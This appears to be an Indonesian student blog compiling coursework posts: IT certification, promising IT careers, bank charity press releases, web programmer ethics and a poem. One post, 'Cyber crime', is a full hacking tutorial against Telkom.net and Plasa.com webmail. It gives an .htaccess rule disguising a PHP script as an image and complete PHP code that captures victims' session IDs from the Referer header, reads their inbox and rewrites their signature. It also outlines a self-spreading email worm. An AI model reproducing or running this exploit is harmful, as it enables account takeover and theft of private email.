Jumat, 27 Mei 2011

tugas etika dan profesionalisme ITS part#4

Pentingnya standarisasi & sertifikasi keahlian di bidang TI


Sertifikasi TI yang diberikan main vendor (penyedia sekaligus pemilik sah hak untuk mengeluarkan sertifikat) tentu akan sangat berguna bagi para praktisi Sertifikasi CCNA. Dan, CCNP Certification yang pernah dikeluarkan perusahaan Cisco, misalnya, telah membuktikan keberhasilannya membangun SDM yang berkualitas sehingga memberikan kesempatan para “lulusan” Cisco untuk meningkatkan karier kerjanya secara profesional. Dengan memiliki sertifikasi CCNA/CCNP serta memiliki pengetahuan tambahan mengenai Cisco Router ini, para praktisi TI di Cisco mendapatkan kesempatan dalam meningkatkan keahliannya di bidang networking.
Saat ini, dengan adanya program sertifikasi keahlian di dunia profesional TI dalam bidang network design maupun network support, keahlian para profesional akan sungguh-sungguh teruji berdasarkan standar perusahaan Cisco Internasional. Sebagai contoh, Cisco Career Certification juga menjadikan para profesional TI terus-menerus mengikuti perkembangan industri teknologi networking. Sertifikasi Cisco dibagi dalam 3 tahap, yaitu tahap Associate, Profesional dan Expert. Tingkat yang paling tinggi adalah Expert.

Microsoft yang juga merupakan perusahaan besar dalam produk software, juga tidak ketinggalan dalam menerapkan standarisasi keahlian penguasaan produknya melalui program sertifikasi keahlian. Microsoft mengeluarkan beberapa sertifikasinya bagi orang-orang yang ingin mengahlikan diri pada bidang tertentu, seperti Microsoft Certified Professional (MCP), Microsoft Office User Soecialist (MOUS), Microsoft Certified System Administrator (MCSA), Microsoft Certified Systems Engineer (MCSE).






Pembiayaan untuk mengambil ujian sertifikasi tertentu di bidang TI memang tidak mudah, mulai dari isi materi termasuk di dalamnya masalah bahasa, hingga yang paling utama adalah faktor biaya. Khusus permasalahan biaya ujian, bagi skala perusahaan, biaya yang harus dikeluarkan untuk karyawannya mungkin adalah hal yang standar saja, namun jika ukurannya adalah per individu, maka biaya mengikuti program ujian sertifikasi skala internasional ini memang terbilang cukup mahal. Padahal, jika peserta ujian gagal, ia tidak memperoleh apa pun selain berkas yang berisikan informasi materi dan nilai hasil ujian.

Sebagai contoh, misalnya, saat ini untuk memperoleh Cisco Certifikasi Cetwork Associates, seorang peserta harus mengeluarkan sejumlah uang hingga Rp 750 untuk satu kali ujian, dan jika gagal maka calon harus menunggu sampai kurang-lebih sepuluh hari untuk bisa ujian kembali. Contoh lain, seorang calon yang akan mengambil ujian CCNA diharuskan memiliki score lebih besar dari passing score yang telah ditentukan oleh perusahaan Cisco, yaitu 849 score, misalnya, maka seorang calon harus bisa melebihi atau sama dengan angka tersebut untuk bisa lulus ujian dan mendapat sertifikasi CCNA.

Sedemikian urgensinya sertifikasi bagi para praktisi TI maka seyogianya agar perusahaan-perusahaan yang bergerak dalam bidang TI di Indonesia menerima tuntutan tersebut sebagai kenyataan yang tidak mungkin dihindari. Sekali lagi, sertifikasi adalah bukti kualitas dan profesionalisme para praktisi TI.

Jumat, 06 Mei 2011

tugas etika dan profesionalisme ITS part#3

PROFESI / BISNIS TI YANG PALING PROSPEKTIF


Parallel Programming

Pada tahun 2012, komputer akan melompat dari core duo prosesor multi-core prosesor – sebanyak 80 prosesor per mesin – daya superkomputer pengepakan ke dalam desktop, kata Jerry Bautista, co-direktur Intel berskala Tera Computing Research Program. Core yang berbeda dapat bekerja secara paralel, seperti simfoni’s instrumen, cracking masalah kompleks, membangun model manusia hidup dan mengantisipasi dengan kebutuhan pengguna, semua pada kecepatan hati. Parallel programmer yang dapat menjaga ‘simfoni’ selaras akan permintaan tinggi. Kualifikasi: Sebuah gelar sarjana atau lebih tinggi di bidang ilmu komputer atau bidang yang relevan, non-linear berpikir dan kreativitas. Gaji: $ 79,000 ke $ 88,000

Teknologi Data
 
Tahun 2012, frekuensi radio ID chip, kamera video, komputer dan sensor akan menghasilkan jumlah informasi yang luar biasa. Teknologi data membangun struktur-nyata dan virtual-yang mengubah tumpukan data menjadi sesuatu yang bermakna dan indah, kata Eric Rodenbeck, pendiri dan direktur kreatif di Desain benang sari.
Kualifikasi: Pengalaman dalam lingkungan virtual, pencitraan dan visualisasi, keterampilan teknis, kemauan untuk belajar alat-alat baru dan imajinasi.
Gaji: $ 90,000 to $ 102,000

Roboticists
 
Dalam satu hal, robot sudah mengambil alih dunia. Komponen, prosesor dan sensor untuk robot semakin murah setiap triwulan, kata Paulus Saffo, teknologi peramal. Ratusan aplikasi baru untuk robot sudah sedang dikembangkan. Robot sudah bekerja di laboratorium penelitian, pabrik, rumah sakit, tempat penitipan anak dan rumah tangga, dan kecenderungan hanya diharapkan tumbuh sebagai lapangan berkembang.
Kualifikasi: Pengalaman dalam ilmu komputer, teknik dan elektronik dan game.
Gaji: $ 80,000 ke $ 90,000

ETPSI 2011

UOB Heartbeat Run/Walk 2011 Serentak di 4 Negara

Jakarta, 27 Maret 2011

Hari Minggu tanggal 27 Maret 2011, secara serentak, diselenggarakan kegiatan Corporate Social Responsibility ("CSR") di 4 negara yaitu UOB Singapura, UOB Malaysia, UOB Thailand dan UOB Buana, Indonesia.

Kegiatan yang diberi judul "UOB Heartbeat Run/Walk 2011" merupakan salah satu kegiatan CSR rutin tahunan dari Grup UOB, yang memiliki fokus pada 3 pilar yaitu, anak-anak, pendidikan dan seni.

Dalam acara "UOB Heartbeat Run/Walk 2011", selain dilakukan lomba jalan sehat dan lari oleh para karyawan dan keluarga, juga dilakukan penyerahan donasi kepada yayasan yang membutuhkan. Donasi tersebut merupakan hasil sumbangan dari seluruh karyawan Bank yang telah dikumpulkan dalam periode tertentu.

Di Jakarta, lebih dari 4.000 peserta yang terdiri dari karyawan UOB Buana beserta keluarga masing-masing, berpartisipasi dalam Lomba Lari/Jalan "UOB Heartbeat Run/Walk 2011". Lomba tersebut mengambil rute UOB Plaza – Bundaran HI – Universitas Atmajaya – UOB Plaza.

Dalam sambutannya di acara tersebut, Bpk. Armand B. Arief, Direktur Utama UOB Buana mengatakan,"Tahun ini untuk kedua kalinya UOB Buana berpartisipasi dalam kegiatan CSR regional "UOB Heartbeat Run/Walk". Acara ini selain sebagai ajang silahturahmi keluarga besar UOB Buana khususnya yang berada di Jabodetabek dan pengembangan team building yang efektif, juga memberikan kesempatan yang baik bagi kami untuk belajar berempati kepada sesama yang membutuhkan. Seperti tahun lalu, sumbangan yang telah dikumpulkan oleh seluruh karyawan UOB Buana didonasikan kepada para anak-anak dengan kebutuhan khusus di YPAC-Jakarta"

Dalam kesempatan yang sama, UOB Buana memberikan donasi sebesar Rp250 juta kepada Yayasan Pembinaan Anak Cacat-Jakarta ("YPAC-Jakarta"), sejalan dengan salah satu pilar CSR dari UOB. YPAC-Jakarta adalah sebuah yayasan yang konsisten memberikan pelayanan kepada anak-anak berkebutuhan khusus/ tuna daksa sejak tahun 1954. Pelayanan tersebut ditujukan untuk mendorong dan membantu anak-anak dengan keterbatasan agar mampu mengatasi kesulitannya, sehingga dalam kehidupan sehari-hari dapat menjadi manusia yang mandiri;

Selain itu, seluruh karyawan dan keluarga UOB Buana yang berpartisipasi  dalam "UOB Heartbeat Run/Walk 2011", berhasil memecahkan rekor MURI dengan membuat 60.000 origami bentuk hati secara bersamaan.

---000----



Mengenai PT Bank UOB Buana

Didirikan di Jakarta pada tahun 1956, UOB Buana merupakan salah satu bank terkemuka di Indonesia dengan jaringan pelayanan sebanyak 214 kantor dan 132 ATM yang tersebar di 30 kota pada 18 provinsi diseluruh Indonesia. Pada tanggal 1 Juli 2010, UOB Buana telah melakukan penggabungan usaha dengan PT Bank UOB Indonesia dan bertindak sebagai Bank yang menerima penggabungan (surviving company).

Per Desember 2010, UOB Buana mencatatkan kinerja keuangan yang cukup baik. Total Asset yang berhasil dibukukan UOB Buana per Desember 2010 adalah sebesar Rp38,3 triliun.

UOB Buana juga mencatat penyalurkan kredit sebesar Rp27,4 triliun per Desember 2010. Pemberian kredit tersebut didominasi oleh kredit retail komersial dan korporasi. Namun demikian, UOB Buana juga terus meningkatkan pangsa pasar kredit konsumernya antara lain dengan melakukan meluncurkan produk dan program baru serta bekerja sama dengan developer-developer terkemuka di Indonesia.

Total Dana Pihak Ketiga per Desember 2010 tercatat sebesar Rp28,27 triliun, yang terdiri dari Giro Rp3,21 triliun, Tabungan Rp7,31 triliun dan Deposito Berjangka Rp17,75 triliun.

Rasio-Rasio Keuangan juga menunjukan tingkat kesehatan Bank yang baik.

Selama tahun 2010, UOB Buana telah menerima berbagai penghargaan antara lain Platinum Trophy dari majalah InfoBank atas kinerja keuangan dengan predikat "Sangat memuaskan" selama 10 (sepuluh) tahun berturut-turut yaitu tahun 2000 hingga 2009. Bisnis Indonesia juga menganugerahkan penghargaan 2010 Banking Efficiency Award kepada UOB Buana. Penghargaan The Most Creative Consumer Bank untuk kategori KPR, Kartu Kredit dan Tabungan juga diberikan oleh Majalah Swa kepada UOB Buana.

Selasa, 22 Maret 2011

Donor Darah UOB Buana 2011

21 Maret 2011
Ketua Redaksi
Agatha V. Lina
1. Redaksi menerima
kiriman berita/
pengetahuan umum.
2. Materi dalam bentuk
naskah jadi dikirimkan
kepada Alamat Redaksi
Lentera UOB Buana.
3. Semua Naskah yang
diterima oleh Redaksi
akan diseleksi oleh
Ketua Redaksi.
4. Redaksi berhak untuk
melakukan penyesuaian
kata yang diterima tanpa
merubah isi.
T E R B I T S E T I A P S E N I N
Kantor Pusat
Alamat Redaksi
Sekretariat Korporasi
UOB Plaza, 15th floor
Jl. M.H. Thamrin No. 10
Jakarta 10230
Phone : +62 21 - 23506000
Fax : +62 21 - 29936632
cst.comm@uob.co.id
www.uobbuana.com
Donor Darah UOB Buana 2011

Sebagai salah satu kegiatan CSR, pada tanggal 21 Maret 2011 UOB Buana bekerjasama dengan Palang Merah Indonesia (PMI) kembali mengadakan kegiatan “DonorDarah UOB Buana”. Kegiatan yang baru pertama kali dilakukan di UOB Plaza ini, mendapat sambutan yang sangat baik dari karyawan UOB Buana yang berada di UOB Plaza dan beberapa Capem sekitar serta beberapa staff dari UOB Property.

Kegiatan ini mendapat dukungan dari Direksi, dimana Deputi President Direktur Wang Lian Khee, Direktur Finance & Corporate Services Safrullah Hadi Saleh dan Direktur Kepatuhan Soehadie Tansol turut hadir dan menyaksikan kegiatan tersebut. Untuk melayani rekan-rekan lain yang tidak berkantor di UOB Plaza, kegiatan donor darah ini juga dilaksanakan di KC Asemka dan KC Kelapa Gading secara bersamaan.


Donor Darah UOB Buana 2011

UOB Buana Tips of the Week
No. 341
Tangkaplah setiap kesempatan agar kita tidak pernah menyesal di kemudian hari.

Kamis, 17 Maret 2011

tugas etika dan profesionalisme ITS part#2


Cyber crime



Analisa kasus Hacking Email Telkom.net dan Plasa.com


Telkom.net dan Plasa.com adalah fasilitas email gratis yang diberikan oleh PT Telkom. Pengguna email telkomnet dan plasacom patut waswas, karena amat mudah untuk menghack email di sana. Hanya dengan membuka sebuah email yang telah dirancang khusus oleh attacker, email anda bisa menjadi milik attacker. Dalam artikel ini saya akan tunjukkan apa kelemahannya, bagaimana cara mengexploitasi kelemahan itu dan tentu saja bagaimana cara agar terhindar dari serangan itu.

Webmail Session Hijacking

Teknik hacking email dalam artikel ini adalah dengan cara hijacking session. Oleh karena itu teknik ini hanya bisa dilakukan pada webmail telkom.net dan plasa.com, pengguna telkom.net dan plasa.com yang menggunakan Outlook/Thunderbird tidak rentan terhadap serangan ini.

Karena http adalah protokol yang stateless, sedangkan untuk membuat session server harus bisa memantau state user, maka digunakanlah session ID sebagai kunci atau penanda suatu session. Bila sessionID diketahui attacker, maka attacker bisa menguasai session korban. Orang lain, siapapun yang membawa sessionIDanda, akan dianggap oleh server sebagai anda . Hijacking session adalah usaha untuk mendapatkan session ID korban, dengan cara predicting, capturing, atau fixating session ID.

SessionID diberikan oleh server dan harus dikembalikan lagi oleh browser (client) setiap kali membuat request. Mekanisme penyimpanan dan pengiriman session ID bisa dilakukan dengan dua cara:

   1. Session Cookie: Session ID diberikan server dalam bentuk cookie dan disimpan oleh browser. Setiap browser melakukan request, cookie tersebut akan dikembalikan ke server lagi sebagai bukti bahwa user tersebut adalah masih orang yang sama.

   2. URL Rewriting: Server menyisipkan session ID dalam halaman html yang dikirimkan ke browser. Session ID tersebut dimasukkan dalam bentuk URL di tag html tertentu seperti link (tag A). Contohnya bila URL link aslinya adalah http://www.somesite.com/inbox.php Oleh server link tersebut akan disisipkan sessionID menjadi:
      <A href="http://www.somesite.com/inbox.php?PHPSESSID=xxxxxxxxx">INBOX</A>

      Dengan cara ini setiap kali user mengklik link tersebut, maka sessionID juga akan dikirim ke server sebagai bukti bahwa user tersebut adalah pengguna session yang sah.

SessionID paling aman disimpan dan dikirim kembali ke server dalam bentuk cookie, apalagi bila cookie tersebut diamankan dengan bit secure atau httponly. Kemungkinan serangan yang bisa dilancarkan untuk mencuri cookie adalah dengan XSS attack dan sniffing attack, kedua jenis serangan itu bisa dicegah dengan bit secure dan httponly.

Bila cookie telah diamankan dengan secure bit, maka cookie tersebut tidak bisa dicuri dengan sniffing karena cookie hanya dikirim melalui https, cookie tersebut juga tidak bisa dicuri dengan serangan XSS karena akses javascript terhadap cookie telah ditutup. Bila cookie hanya dilindungi dengan httponly, maka cookie itu aman dari serangan XSS, namun rentan sniffing bila cookie dikirimkan melalui http biasa.

Berbeda dengan cookie, menyimpan Session ID dalam URL sangatlah berbahaya, karena URL mudah dilihat, dikopi dan disimpan dalam bookmark, log file dan sebagainya. Selain itu sessionID juga bisa bocor ke tempat lain melalui header Referer. Sebab header Referer bertugas membawa URL dimana sebuah request dilakukan. Bila dalam suatu halaman terjadi request untuk mengambil gambar, maka header Referer akan mengandung URL dari halaman tersebut. Dalam artikel ini saya akan menggunakan jurus header Referer untuk membajak sessionwebmail Telkom.net dan Plasa.com. Bagi pemilik situs, tentu sering melihat header ini dengan program statistic seperti Awstats untuk melihat pengunjung situs berasal dari situs mana saja.

SessionID webmail Telkom.net dan Plasa.com disimpan pada URL sehingga memudahkan pembajakan session. Mari kita lihat bagaimana bentuk URL webmail telkom.net dan plasa.com:

http://mail.telkom.net/Session/206017-7vY8EVuJF2935NV9Fhzl-kmbcuww/mailbox.wssp?Mailbox=INBOX&amp;

http://mail1.plasa.com/Session/70174-k2O8e3vcnJEFxmxWYpOX-kmbcuwc/mailbox.wssp?Mailbox=INBOX&amp;

Stealing SessionID from Referer Header

Session ID pada URL telkom.net dan plasa.com disisipkan setelah /Session/ hingga karakter / (slash). Sekarang bagaimana caranya attacker bisa mengetahui URL yang sedang dibuka korban di browsernya? Di awal saya sudah menyebutkan sekilas tentang header request yang bernama Referer. Tugas dari header ini adalah mengirimkan URL halaman yang melakukan request. Agar lebih jelasnya mari kita lihat sebuah contoh.

Ketika pengunjung sedang membuka halaman dengan URL:
http://mail.telkom.net/Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/Mailbox.wssp?Mailbox=INBOX

Kemudian ketika terjadi request ke sebuah file image:
http://mail.telkom.net/Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/batal.gif

Maka pada request GET tersebut akan ada header seperti di bawah ini:

GET /Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/batal.gif HTTP/1.1
0
            Host: mail.telkom.net
1
            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10)
2
            Gecko/2009042316 Firefox/3.0.10 GTB5 ImageShackToolbar/5.0.0
3
            Accept: image/png,image/*;q=0.8,*/*;q=0.5
4
            Accept-Language: en-us,en;q=0.5
5
            Accept-Encoding: gzip,deflate
6
            Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
7
            Keep-Alive: 300
8
            Connection: keep-alive
9
10
            /mailbox.wssp?Mailbox=INBOX&
11
            Cache-Control: max-age=0

Pada baris ke-10 terdapat header Referer yang menunjukkan bahwa request tersebut terjadi ketika kepada user sedang berada di URL tersebut. Karena URL yang direquest adalah http://mail.telkom.net/Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/batal.gif, maka web server mail.telkom.net tempat file batal.gif tersebut berada, dapat mengetahui URL ketika request tersebut terjadi. Sekarang bayangkan apa yang terjadi bila request tersebut bukan mendownload image dari mail.telkom.net, tapi dariserver www.evilhackersite.com/image.jpg. Web server di www.evilhackersite.com tentu akan mendapatkan URL tempat terjadinya request dari header Referer. Dan karena URL tersebut mengandung Session ID, maka dengan mudah attacker akan membajak sessionanda.

Attack Scenario

Webmail telkom.net dan plasa.com menggunakan URL sebagai mekanisme pertukaran session ID. Attacker bisa menjebak korban untuk membuka sebuah email yang mengandung gambar yang berlokasi diserver attacker. Tag IMG tersebut akan membuat browser korban melakukan request ke server attacker, dengan tentu saja mengirimkan URL korban dalam header Referer. Dengan mengetahui session ID korban, attacker dengan mudah menguasai accountwebmail korban.

Preparing the Script

Sebelum bisa melakukan serangan, yang pertama harus dilakukan adalah menyiapkan server side script sebagai target request untuk menangkap SessionID korban. Server side script ini akan di-”masking” sebagai file JPG dengan menggunakan mod_rewrite Apache (.htaccess). Server side script yang dimasking sebagai file JPG inilah yang akan dimasukkan dalam tag IMG dalam email yang dibaca korban. Bila korban membaca email attacker, maka akan terjadi request keserver side script itu, sehingga attacker bisa mendapatkan session ID korban dan menguasai emailnya.

URL yang akan kita jadikan tujuan request adalah: http://www.ilmuhacking.com/mylab/image.jpg yang sebenarnya adalah masking untuk server side script http://www.ilmuhacking.com/mylab/checkmail.php. Dengan menggunakan mod_rewrite Apache dan settings .htacess berikut ini masking checkmail.php menjadi image.jpg bisa dilakukan:

1. RewriteEngine On

2.  RewriteBase /

3. RewriteRule mylab/image.jpg mylab/checkmail.php

            Berikutnya saya harus menyiapkan file checkmail.php. Tugas dari script php itu adalah mendapatkan session ID kemudian langsung membajak session korban bermodalkan session ID tersebut.


            <?php
// Ambil header Referer
$ref = $_SERVER["HTTP_REFERER"];
$telkomnet = false;
$plasacom = false;
$width = 468;
$height = 100;
if (strpos($ref,“telkom.net”)>-1) {
$telkomnet = true;
}
if (strpos($ref,“plasa.com”)>-1) {
$plasacom = true;
}
if ($telkomnet===false && $plasacom===false) {
exit();
}

$file = fopen(“daftarkorban.txt”,“a”);
$url_tokens = parse_url($ref);
$host = $url_tokens["host"];
$tokens = explode(“/”,$ref);
$sessid = $tokens[4];
fwrite($file,“######\n“);
fwrite($file,“REFERER:”.$_SERVER["HTTP_REFERER"].“\n“);
fwrite($file,“SESSID:”.$sessid.“\n“);

$urlhost = “http://$host/Session/$sessid/mailbox.wssp?Mailbox=INBOX&”;
$inboxhtml = file_get_contents($urlhost);

preg_match(‘/<title>(.*?)<\/title>/i’, $inboxhtml, $matches);
$title=$matches[1];
$email = $title;
$pos = strpos($title,” “);
if ($pos > -1) {
$email = substr($title,0,$pos);
}

fwrite($file,“KORBAN:”.$email.“\n“);
fwrite($file,“******\n“);
fclose($file);

$image = ImageCreate($width, $height);
$white = ImageColorAllocate($image, 255, 255, 255);
$black = ImageColorAllocate($image, 0, 0, 0);
$grey = ImageColorAllocate($image, 204, 204, 204);
ImageFill($image, 0, 0, $black);
ImageString($image, 3, 15, 5, $sessid, $white);
ImageString($image, 3, 25, 25, $email, $white);

// Writing Signature…
$url = “http://mail.telkom.net/Session/$sessid/settings.wssp”;
if ($plasacom==true) {
$url = “http://mail1.plasa.com/Session/$sessid/settings1.wssp”;
}
$old_settings = file_get_contents($url);
preg_match(‘/<textarea(.*?)>(.*?)<\/textarea>/i’, $old_settings, $matches);
$oldsig = $matches[2];

$data = array();
$data["UserFrom"] = $email;
$newsig = “[YOUR EMAIL HAS BEEN HACKED]“.$oldsig;
$data["Signature"] = $newsig;
$data["Update"] = “Update”;

$response = doPost($url,$data);
if ((strpos($response,“Updated”)>-1 && $telkomnet==true) || $plasacom==true) {
ImageString($image, 3, 35, 50, “Signature anda berhasil diganti menjadi:” , $white);
ImageString($image, 3, 45, 65, $newsig , $white);
}
header(“Content-Type: image/jpeg”);
ImageJpeg($image);
ImageDestroy($image);

function doPost($url,$data) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
$response = curl_exec($ch);
if(curl_errno($ch))
{
$response = curl_error($ch);
}
curl_close($ch);
return $response;
}
?>

Cara kerja script di atas adalah: Pada baris ke-3 isi header Referer diambil. Kemudian dibuat dan dibuka file daftarkorban.txt. File ini adalah log yang menyimpan daftar korban. Pada baris ke-22, session ID diambil dari header referer. Setelah session ID didapatkan kini script bisa mengubah signature korban, dengan cara mengirimkan POST request ke http://mail.telkom.net/Session/[SESSIONID_KORBAN]/settings.wssp, perhatikan baris ke-65. Setelah mengubah signature korban, pada baris ke-66 sampai baris ke-72, script membuat image dengan pesan “Signature anda berhasil diganti menjadi:”.

Launch The Attack

Oke, kini semua persiapan sudah siap. Kini saatnya kita melancarkan serangan dengan mengirimkan email html yang mengandung tag IMG. Dalam contoh attacker adalah rizki.wicaksono@telkom.net dan korban adalah rizki.wicaksono@plasa.com. Ingat ini hanya contoh, dalam kenyataannya attacker bisa menggunakan email apapun, bahkan email palsu (anonymous). Perhatikan gambar berikut ini yang menunjukan bagaimana email yang berisi jebakan dibuat dan ditujukan untuk korban.

Dalam gambar tersebut email diisi dengan tag HTML IMG. Perhatikan bahwa saya bisa saja membuat image tersebut invisible dengan memberikan atribut width dan src 0. Dengan membuat image menjadi invisible, korban tidak akan menyadari bahwa emailnya telah dibajak. Tapi untuk contoh saya membiarkan gambar berukuran besar. Berikut ini adalah isi tanda tangan (signature) email korban sebelum email dibuka.

Dan gambar berikut adalah gambar ketika email attacker tiba.
email attacker tiba


Dan gambar berikut adalah gambar ketika email attacker dibuka oleh korban. Pada gambar tersebut terlihat bahwa session id korban dan pesan bahwa signature korban berubah tertulis dalam file image.jpg.

Pada saat korban membuka email dari attacker, pada saat itu juga attacker menguasai penuh account email korban. Dalam contoh artikel ini attacker mengubah signature korban dengan menambahkan string [YOUR EMAIL HAS BEEN HACKED]. Berikut ini adalah gambar signature korban setelah korban membuka email attacker.

Worm Attack: More Dangerous Scenario

Skenario serangan yang lebih berbahaya adalah bila attacker mengeksploitasi kelemahan ini untuk menciptakan worm. Ingat bahwa ketika attacker mendapatkan session ID, pada saat itu attacker memiliki power yang setara dengan korban. Dengan session korban, attacker bisa mengirimkan email serangan yang sama ke calon korban lain yang ada di dalam daftar buku alamat korban. Begitu teman korban membuka email itu, maka session dia juga dalam genggaman attacker dan dia juga akan menyebarkan serangan ke teman-temannya. Hal ini akan memicu reaksi berantai yang berbahaya.

Sulitkah membuat worm seperti itu? Tidak sulit kok, mudah sekali. Semua itu tidak lebih dari kombinasi request GET dan POST dengan berbekal session ID korban. Attacker harus membaca phone book dengan mengirim request HTTP (GET/POST) dengan session ID korban. Setelah itu attacker akan mengirimkan email serangan ke teman-teman korban juga dengan melakukan request HTTP dengan session ID korban. Begitu seterusnya. Tidak sulit bukan, apalagi buat orang yang sudah sering memprogram.

Tips Menghindari Serangan

Karena serangan ini dilakukan dengan membajak session web, maka serangan ini hanya bisa dilakukan bila korban membaca email telkom.net dan plasa.com dengan webmail. Jadi agar terhindar dari serangan ini, gunakanlah akses POP3 atau IMAP untuk membaca email. Dengan menggunakan email client non-web seperti Thunderbird dan Outlook anda akan aman dari serangan ini.n/atau (c) akses ke jaringan telekomunikasi khusus."

Referensi
Ilmuhacking binushacker

Senin, 28 Februari 2011

PRAKTEK ETIKA SEORANG PROFESIONAL BID. IT

PROFESIONALISME WEB PROGRAMMER
 



Menjalani profesi dibidang IT, banyak orang yang melakukannya. Tapi bagaimana menjadi seorang profesional IT sendiri, masih banyak yang belum menjalaninya. IT adalah ladang kerja yang saat ini mulai dilirik oleh pencari kerja. Maraknya lembaga pelatihan dan pendidikan formal maupun non-formal yang mendidik dan menghasilkan lulusan di bidang IT, adalah salah satu contoh makin digemarinya lahan kerja yang satu ini. Meski boleh dibilang tidak murah namun banyak lulusan SMU/sederajat yang akhirnya memilih pendidikan lanjutan di bidang IT. Puncak karir seorang profesional IT di perusahaan adalah menjadi CIO (Chief Information Officer), yaitu pimpinan tertinggi di dalam organisasi (fungsi) teknologi informasi. Salah satu hasil penelitian menyatakan bahwa top 5 kompetensi yang harus dimiliki oleh seorang CIO antara lain adalah:
 
1. Kemampuan mendelegasikan tugas-tugas operasional
2. Kemampuan menjalankan otoritas pengeluaran / finansiil
3. Kemampuan menghindari posisi-posisi yang menimbulkan pertantangan
4. Kemampuan menginisiasi atau menjalin hubungan dengan unit-unit diluar IT
5. Kemampuan menggunakan bahasa dengan hati-hati (komunikasi verbal)

Kemampuan / Kompetensi Web Programmer : 


• Membuat desain grafis, baik itu web maupun animasi
• Perlu menguasai web design dan aplikasi berbasis web 

• Menguasai pengembangan aplikasi web berbasis HTML dan ASP.Net ATAU aplikasi web berbasis  HTML dan J2EE serta Struts Framework ATAU aplikasi web berbasis MySQL dan PHP.  
• Web programmer bertugas untuk menghadirkan system dan layanan dari sebuah website.    Berseberangan dengan web designer, hasil kerja dari seorang web programmer tidak secara    mudah terlihat oleh user. System yang dibangun tidak dapat terlihat ‘kecantikannya’       secara langsung oleh rata-rata user.Kecantikan sebuah system yang dapat dilihat dari segi    struktur program, mungkin hanya dapat dinikmati oleh sesama web programmer yang mengerti    benar tentang teknis – teknis pembangunan sebuah program. Karena kebanyakan user tidak    benar – benar peduli tentang teknis pemograman, kecuali mereka yang memang bersinggungan    dengan dunia pemrograman, maka fokus yang harus diperhatikan oleh seorang web programmer     adalah efektifitas dan effisiensi dari program yang dibangunnya, termasuk kecepatan,    keamanan dan kerapian system.


 Mungkin seorang user tidak akan tahu atau tidak ingin tahu dan bahkan tidak harus tahu tentang teknologi mana yang dipakai oleh seorang web programmer. Oleh karenanya, membicarakan semua ‘geek talk’ tentang kehebatan sebuah system yang dipilih ditinjau dari segi teknisnya tidak akan membawa manfaat bagi user yang ada.

Beberapa perusahaan di dunia internet sering membagi tugas web programmer dengan database administrator. Database administrator adalah sebuah profesi lain yang bertugas untuk membangun dan menjaga sebuah database agar tetap efektif dan efisien baik dari segi keamanan, kecepatan maupun kerapiannya.


Jumat, 14 Januari 2011

tugas bahasa indonesia part #4 (puisi)


rumput

Dia itu seperti rumput
selalu berubah setiap angin berhembus
lihatlah rumput itu teman
bergerak kesana kemari tetapi mereka begitu gemulai
namun yang paling menyedihkan dia seperti kehilangan arah
takut terhempas namun tetap diam di satu tempat
karena saya adalah rumput
jangan pertanyakan konsistensi saya terhadap tanah diatas dunia ini
saya hanya bergerak mengikutinya
bukan berarti saya menerima nasib
tetapi karena ini takdir yang salah pilih!
Karena saya adalah rumput